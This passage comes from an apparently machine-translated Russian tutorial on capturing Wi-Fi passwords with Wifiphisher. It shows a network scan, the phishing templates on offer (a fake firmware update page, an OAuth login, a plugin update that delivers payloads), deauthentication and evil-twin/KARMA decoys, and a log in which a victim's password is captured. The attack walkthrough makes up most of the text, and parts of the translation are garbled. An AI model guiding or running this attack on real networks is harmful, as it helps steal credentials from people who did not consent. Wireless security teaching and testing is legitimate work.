  Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз ESSID BSSID CH PWR ENCR КЛИЕНТЫ ВЕНДОР _________________________________________________________________________________________ │ Команда исследователей CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │ │ ██████████████ ██████████████ ███ 100% WPA2 2 Belkin International │ │ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │ │ █████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │ │ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │ │ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Belkin International │ │ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │ │ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│ │ █████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │ │ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │ │ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │ │ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │ │ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │ │ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Группа Arris │ │ ██████████ ██████████████ ███ 46% WPA2 0 Технологии Tp-link │ │ █████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │ ——————————————————————————————————————————————————— ———————————————————————————————————————  

Далее скрипт спросит, какая атака ты хочешь бежать. Выберите вариант 2.

  Параметры: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз Доступные сценарии фишинга: 1 - Network Manager Connect Имитирует поведение сетевого администратора.В этом шаблоне отображается страница Chrome «Ошибка подключения» и окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые диспетчеры Windows и MAC OS. 2 - Страница обновления прошивки Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающая пароль WPA / WPA2 из-за обновления прошивки. Подходит для мобильных устройств. 3 - Страница входа в OAuth Бесплатная служба Wi-Fi, запрашивающая учетные данные Facebook для аутентификации с помощью OAuth. 4 - Обновление плагина браузера Общая страница обновления подключаемого модуля браузера, которую можно использовать для предоставления полезных данных жертвам. 

После выбора атаки сразу запустится. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и будет создавать поддельные версии, чтобы заманить эти устройства для подключения.

  Канал расширений: │ Wifiphisher 1.4GIT DEAUTH / DISAS - ██████████████████ │ ESSID: DEAUTH / DISAS - ██████████████████ │ Канал: 11 │ Интерфейс AP: wlan1 │ Варианты: [ESC] Выйти │ _________________________ Связанные жертвы: Запросы HTTPS:  

После того, как цель присоединится, всплывающее окно потребует ввести пароль.

Когда цель вводит пароль, мы уведомляемся на экране Wifiphisher.

  Канал расширений: DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ Жертва █████████████████ проверила WLAN с помощью ESSID: 'FakeNed' (KARMA) Жертва █████████████████ проверила WLAN с помощью ESSID: «Хармонд Фернандес» (Злой близнец) Связанные жертвы: ██████████████████ 10.0.0.13 Apple iOS / MacOS ██████████████████ 10.0.0.29 Murata Manufacturing HTTPS-запросы: [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] POST-запрос из 10.0.0.13 с wfphshr-wpa-password = myfatpassword [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html  

Вот и все! Сценарий завершится и представит вам только что введенный пароль.

  [*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10 [+] Обнаружен часовой пояс. Установка диапазона каналов от 1 до 13 [+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации [+] Выбор интерфейса wlan1 для создания мошеннической точки доступа [+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5 [!] Не удалось установить MAC-адрес. (Пробовал 00: 00: 00: ee: 5c: 95) [+] Отправка SIGKILL на wpa_supplicant [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL в NetworkManager [*] Убрал аренду, запустил DHCP, настроил iptables [+] Выбор шаблона страницы обновления прошивки [*] Запуск фейковой точки доступа... [*] Запуск HTTP / HTTPS-сервера на портах 8080, 443 [+] Покажи свою поддержку! [+] Следите за нами: https://twitter.com/wifiphisher [+] Ставьте нам лайки: https://www.facebook.com/Wifiphisher [+] Полученные учетные данные: wfphshr-wpa-password = myfatpassword [!] Закрытие  

Вот так, вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашу поддельную сеть. Хуже того, они все еще застряли за этим ужасным медленным фальшивым экраном загрузки.

Если вы ищете дешевую удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.

Надеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже и не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.

Начните взламывать сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux

Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою профессиональную карьеру хакера с помощью нашего комплекта обучения премиум-сертификату по этическому хакерству 2020 года из нового магазина Null Byte и получите более 60 часов обучения от профессионалов в области этического хакерства.

Купить сейчас (90% скидка)>

Смотрите также

• 
  Как обновить iphone без wifi
• 
  Как передать файлы с компьютера на телефон через wifi
• 
  Как прописать настройки роутера
• 
  Как сделать вай фай роутер
• 
  Как узнать пароль от своего wifi интерсвязь
• 
  Башинформсвязь как настроить роутер
• 
  Как выбрать хороший wifi роутер
• 
  Как узнать ревизию роутера dir 615
• 
  Как подключить принтер к компьютеру через роутер
• 
  Как подключить роутер к интернету
• 
  Как подключить интернет на телефон через роутер